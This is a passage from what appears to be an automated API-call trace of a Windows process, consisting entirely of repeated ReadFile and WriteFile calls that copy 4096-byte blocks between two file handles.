lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.236] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.236] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.237] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.237] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.237] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.237] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.238] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.238] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.287] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.287] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.287] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.287] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.288] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.288] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.288] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.288] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.288] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.289] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.289] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.289] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.289] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.289] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.290] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.290] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.290] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.290] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.290] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.290] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.291] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.291] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.291] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.291] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.292] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.292] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.292] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.292] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.292] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.292] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.293] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.293] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.294] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.294] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.295] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.295] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.295] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.295] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.295] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.295] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.296] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.296] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.296] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.296] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.296] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.296] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.297] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.297] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.297] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.297] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.298] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.298] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.298] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.298] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.298] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.298] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.299] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.299] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.299] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.299] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.299] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.299] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.300] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.300] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.302] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.302] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.303] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.303] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.303] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.303] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.303] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.303] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.304] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.304] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.304] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.304] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.304] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.304] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.305] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.305] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.306] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.306] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.306] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.306] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.307] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.307] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.307] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.307] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.307] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.307] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.308] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.308] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, 